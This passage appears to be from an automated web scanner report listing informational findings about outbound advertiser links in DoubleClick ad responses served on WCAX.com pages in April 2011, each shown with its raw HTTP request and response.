GET /adi/wn.loc.wcax/community;sz=500x300;wnsz=49;tile=9;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 377

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ae4/0/0/%2a/l;44306;0-0;0;29116597;1261-500/300;0/0/0;;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...
10.10. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=468x60;wnsz=1;tile=7;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=80658097? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 578

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/x%3B234083978%3B1-0%3B0%3B29116597%3B1-468/60%3B41153816/41171603/1%3B%3B%7Esscs%3D%3fhttp://aftermidnightjewelers.com/trollbeads.php" target="_blank"><img border="0" src="http://s0.2mdn.net/1981085/amj-trollbeads-full.jpg?adID=234083978" WIDTH="468" HEIGHT="60" alt="" title=""></a>
...[SNIP]...
10.11. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=180x150;wnsz=35;tile=8;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 603

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/p%3B211848897%3B0-0%3B0%3B29116597%3B2928-180/150%3B30237913/30255790/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129575_AM.gif?adID=211848897" WIDTH="180" HEIGHT="150" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.12. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=300x250;wnsz=52;tile=5;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=80658097? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 627

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
/t%3B234572979%3B0-0%3B0%3B29116597%3B4307-300/250%3B40072437/40090224/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Masters-in-Early-Childhood-Education.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186086_AM.jpg?adID=234572979" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.13. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=490x25;wnsz=22;tile=6;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 601

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/z%3B211870089%3B0-0%3B0%3B29116597%3B9289-490/25%3B30238038/30255915/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129574_AM.jpg?adID=211870089" WIDTH="490" HEIGHT="25" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.14. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=728x90;wnsz=46;tile=3;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=7883512? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:39:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 582

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/y%3B238619019%3B0-0%3B0%3B29116597%3B3454-728/90%3B41240222/41258009/1%3B%3B%7Esscs%3D%3fhttp://www.svc.edu/admission/openhouse.html" target="_blank"><img border="0" src="http://s0.2mdn.net/3137412/SVCOpenHouse-Leaderboard.gif?adID=238619019" WIDTH="728" HEIGHT="90" alt="" title=""></a>
...[SNIP]...
10.15. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=300x250;wnsz=52;tile=5;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=49374599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:34:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 583

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
d.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/i%3B234083805%3B1-0%3B0%3B29116597%3B4307-300/250%3B41153854/41171641/1%3B%3B%7Esscs%3D%3fhttp://aftermidnightjewelers.com/trollbeads.php" target="_blank"><img border="0" src="http://s0.2mdn.net/1981085/amj-trollbeads-Cube.jpg?adID=234083805" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.16. http://ad.doubleclick.net/adi/wn.loc.wcax/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/community

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/community;sz=180x150;wnsz=35;tile=8;wncc=Community;wnpt=C;wnpc=category;wncp=WCAX;wncid=18836;wnad85=wcax;wnad44=wcax;wnad46=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad35=wcax;wnad49=wcax;apptype=platform;env=production;ord=80658097? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:35:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 560

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/r%3B239321176%3B0-0%3B0%3B29116597%3B2928-180/150%3B41453841/41471628/1%3B%3B%7Esscs%3D%3fhttp://vthomeandgardenshow.com/" target="_blank"><img border="0" src="http://s0.2mdn.net/3150129/homeshow2011.jpg?adID=239321176" WIDTH="189" HEIGHT="150" alt="" title=""></a>
...[SNIP]...
10.17. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=43;tile=3;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=19506790? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:31:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
lick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/h%3B213798723%3B1-0%3B0%3B29116611%3B4307-300/250%3B30976053/30993929/1%3B%3B%7Esscs%3D%3fhttp://rrmc.privatehealthnews.com/html/babyexpecting.asp" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/134911_AM.gif?adID=213798723" WIDTH="300" HEIGHT="250" alt="RRMC" title="RRMC"></a>
...[SNIP]...
10.18. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=52;tile=4;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=10981992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:39:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 634

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script>
var gfEbForceStreaming = 1;

</script>
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326411&PluID=0&w=300&h=250&ord=[timestamp]&ucm=true"></script>
<noscript>
<a href="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2326411&Page=&PluID=0&Pos=320" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2326411&Page=&PluID=0&Pos=320" border=0 width=300 height=250></a>
...[SNIP]...
10.19. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=180x150;wnsz=35;tile=7;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:29:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 560

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/x%3B239321176%3B0-0%3B0%3B29116611%3B2928-180/150%3B41453841/41471628/1%3B%3B%7Esscs%3D%3fhttp://vthomeandgardenshow.com/" target="_blank"><img border="0" src="http://s0.2mdn.net/3150129/homeshow2011.jpg?adID=239321176" WIDTH="189" HEIGHT="150" alt="" title=""></a>
...[SNIP]...
10.20. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=180x150;wnsz=35;tile=7;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=19506790? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:31:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 603

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
<a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3ae4/3/0/%2a/v%3B211848897%3B0-0%3B0%3B29116611%3B2928-180/150%3B30237913/30255790/1%3B%3B%7Esscs%3D%3fhttp://www.greenmtntoursvt.com" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/129575_AM.gif?adID=211848897" WIDTH="180" HEIGHT="150" alt="Green Mountain Tours" title="Green Mountain Tours"></a>
...[SNIP]...
10.21. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=52;tile=4;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=19506790? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:31:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 643

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
054302%3B0-0%3B0%3B29116611%3B4307-300/250%3B41100468/41118255/1%3B%3B%7Esscs%3D%3fhttp://www.vermontcorporatecollege.com?utm_campaign=vcc-spring2011&utm_source=wcax&utm_medium=banner" target="_blank"><img border="0" src="http://s0.2mdn.net/3127317/VTCC4620-Banner-Ad-300X250.gif?adID=238054302" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.22. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=43;tile=3;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=10981992? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 09 Apr 2011 12:39:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 658

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template ID = 6770 Template Name = +WorldNow Image with C
...[SNIP]...
6611%3B4307-300/250%3B40072567/40090354/1%3B%3B%7Esscs%3D%3fhttp://www.champlain.edu/Graduate-Studies/Programs/Master-of-Science-in-Managing-Innovation-and-Information-Technology.html" target="_blank"><img border="0" src="http://WCAX.images.worldnow.com/ads/186089_AM.jpg?adID=234573217" WIDTH="300" HEIGHT="250" alt="" title=""></a>
...[SNIP]...
10.23. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/wn.loc.wcax/homepage

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/wn.loc.wcax/homepage;sz=300x250;wnsz=43;tile=3;wncc=Homepage;wnpt=C;wnpc=home;wncp=WCAX;wncid=18195;wnad85=wcax;wnad44=wcax;wnad43=wcax;wnad52=wcax;wnad1=wcax;wnad88_188169=wcax;wnad88_13530=ap;wnad35=wcax;wnad88_18197=wcax;wnad49=wcax;apptype=platform;env=production;ord=89441616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
